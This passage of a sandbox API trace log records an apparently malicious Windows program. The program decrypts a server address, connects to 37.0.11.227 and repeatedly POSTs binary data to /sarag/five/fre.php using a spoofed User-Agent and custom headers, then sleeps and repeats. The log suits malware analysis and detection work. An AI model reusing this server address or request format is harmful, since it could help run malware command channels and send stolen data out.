| out: buf=0x6b2fb8*) returned 204 [0210.696] GetProcessHeap () returned 0x690000 [0210.697] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0210.697] GetProcessHeap () returned 0x690000 [0210.697] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0210.698] GetProcessHeap () returned 0x690000 [0210.698] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0210.698] GetProcessHeap () returned 0x690000 [0210.699] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0210.699] closesocket (s=0x4d0) returned 0 [0210.699] GetProcessHeap () returned 0x690000 [0210.699] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0210.699] GetProcessHeap () returned 0x690000 [0210.700] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0210.700] GetProcessHeap () returned 0x690000 [0210.700] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0210.700] GetProcessHeap () returned 0x690000 [0210.701] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0210.701] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc38) returned 0x4d0 [0210.702] Sleep (dwMilliseconds=0xea60) [0210.704] GetProcessHeap () returned 0x690000 [0210.704] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0210.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.705] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0210.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.711] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0210.720] GetProcessHeap () returned 0x690000 [0210.731] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0210.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.752] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0210.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.753] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0210.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.755] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.755] GetProcessHeap () returned 0x690000 [0210.755] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0210.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.756] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0210.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.758] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0210.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.759] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0210.759] GetProcessHeap () returned 0x690000 [0210.759] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0210.760] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.760] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0210.761] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.761] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0210.762] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.762] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0210.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.763] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0210.764] GetProcessHeap () returned 0x690000 [0210.764] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0210.764] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0210.764] GetProcessHeap () returned 0x690000 [0210.764] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0210.764] GetProcessHeap () returned 0x690000 [0210.765] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0210.765] GetProcessHeap () returned 0x690000 [0210.765] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0210.765] GetProcessHeap () returned 0x690000 [0210.765] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0210.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.766] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0210.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.774] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0210.781] GetProcessHeap () returned 0x690000 [0210.781] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0210.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.782] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0210.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.783] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0210.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.785] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.785] GetProcessHeap () returned 0x690000 [0210.785] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0210.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.787] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0210.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.788] CryptDestroyKey (hKey=0x69d628) returned 1 [0210.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.789] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0210.789] GetProcessHeap () returned 0x690000 [0210.789] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0210.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.790] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0210.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.791] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0210.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.792] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0210.793] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.793] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0210.793] GetProcessHeap () returned 0x690000 [0210.793] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0210.794] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0210.794] GetProcessHeap () returned 0x690000 [0210.794] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab320 [0210.794] socket (af=2, type=1, protocol=6) returned 0x4d4 [0210.794] connect (s=0x4d4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0210.819] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0210.819] GetProcessHeap () returned 0x690000 [0210.819] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0210.819] GetProcessHeap () returned 0x690000 [0210.819] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0210.820] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0210.821] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0210.821] GetProcessHeap () returned 0x690000 [0210.821] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0210.821] GetProcessHeap () returned 0x690000 [0210.821] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0210.822] GetProcessHeap () returned 0x690000 [0210.822] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0210.822] GetProcessHeap () returned 0x690000 [0210.822] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0210.822] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0210.823] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0210.823] GetProcessHeap () returned 0x690000 [0210.823] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0210.824] GetProcessHeap () returned 0x690000 [0210.824] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0210.824] send (s=0x4d4, buf=0x6ad508*, len=242, flags=0) returned 242 [0210.825] send (s=0x4d4, buf=0x6aba40*, len=159, flags=0) returned 159 [0210.825] GetProcessHeap () returned 0x690000 [0210.825] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0210.825] recv (in: s=0x4d4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0210.922] GetProcessHeap () returned 0x690000 [0210.922] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0210.923] GetProcessHeap () returned 0x690000 [0210.923] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0210.923] GetProcessHeap () returned 0x690000 [0210.924] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0210.924] GetProcessHeap () returned 0x690000 [0210.924] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0210.924] closesocket (s=0x4d4) returned 0 [0210.925] GetProcessHeap () returned 0x690000 [0210.925] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab320 | out: hHeap=0x690000) returned 1 [0210.925] GetProcessHeap () returned 0x690000 [0210.925] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0210.925] GetProcessHeap () returned 0x690000 [0210.925] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0210.925] GetProcessHeap () returned 0x690000 [0210.926] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0210.926] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1318) returned 0x4d4 [0210.928] Sleep (dwMilliseconds=0xea60) [0210.929] GetProcessHeap () returned 0x690000 [0210.929] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0210.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.931] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0210.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.944] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0210.952] GetProcessHeap () returned 0x690000 [0210.952] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0210.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.953] CryptImportKey (in: hProv=0x6af188, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0210.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.957] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0210.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.958] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.958] GetProcessHeap () returned 0x690000 [0210.958] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0210.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.960] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0210.961] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.961] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0210.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.962] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0210.962] GetProcessHeap () returned 0x690000 [0210.962] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0210.963] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.964] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0210.971] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.971] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0210.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.972] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0210.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.974] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0210.974] GetProcessHeap () returned 0x690000 [0210.974] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0210.974] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0210.974] GetProcessHeap () returned 0x690000 [0210.975] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0210.975] GetProcessHeap () returned 0x690000 [0210.975] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0210.975] GetProcessHeap () returned 0x690000 [0210.976] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0210.976] GetProcessHeap () returned 0x690000 [0210.976] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0210.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.979] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0210.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.985] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0210.992] GetProcessHeap () returned 0x690000 [0210.992] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0210.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.994] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0210.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.995] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0210.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.996] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.996] GetProcessHeap () returned 0x690000 [0210.997] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0210.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.998] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0211.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.001] CryptDestroyKey (hKey=0x69d028) returned 1 [0211.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0211.003] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0211.003] GetProcessHeap () returned 0x690000 [0211.003] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0211.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.004] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0211.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.005] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0211.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.006] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0211.007] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.008] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0211.008] GetProcessHeap () returned 0x690000 [0211.008] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0211.008] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0211.008] GetProcessHeap () returned 0x690000 [0211.008] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0211.008] socket (af=2, type=1, protocol=6) returned 0x4d8 [0211.008] connect (s=0x4d8, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0211.040] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0211.040] GetProcessHeap () returned 0x690000 [0211.040] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0211.040] GetProcessHeap () returned 0x690000 [0211.040] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0211.041] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0211.044] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0211.044] GetProcessHeap () returned 0x690000 [0211.044] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0211.044] GetProcessHeap () returned 0x690000 [0211.045] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0211.045] GetProcessHeap () returned 0x690000 [0211.045] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0211.045] GetProcessHeap () returned 0x690000 [0211.045] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0211.046] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0211.047] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0211.047] GetProcessHeap () returned 0x690000 [0211.047] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0211.047] GetProcessHeap () returned 0x690000 [0211.047] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0211.048] send (s=0x4d8, buf=0x6ab500*, len=242, flags=0) returned 242 [0211.048] send (s=0x4d8, buf=0x6aba40*, len=159, flags=0) returned 159 [0211.048] GetProcessHeap () returned 0x690000 [0211.049] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0211.049] recv (in: s=0x4d8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0211.137] GetProcessHeap () returned 0x690000 [0211.137] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0211.138] GetProcessHeap () returned 0x690000 [0211.138] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0211.138] GetProcessHeap () returned 0x690000 [0211.138] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0211.138] GetProcessHeap () returned 0x690000 [0211.138] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0211.138] closesocket (s=0x4d8) returned 0 [0211.139] GetProcessHeap () returned 0x690000 [0211.139] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0211.139] GetProcessHeap () returned 0x690000 [0211.140] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0211.140] GetProcessHeap () returned 0x690000 [0211.140] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0211.140] GetProcessHeap () returned 0x690000 [0211.141] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: 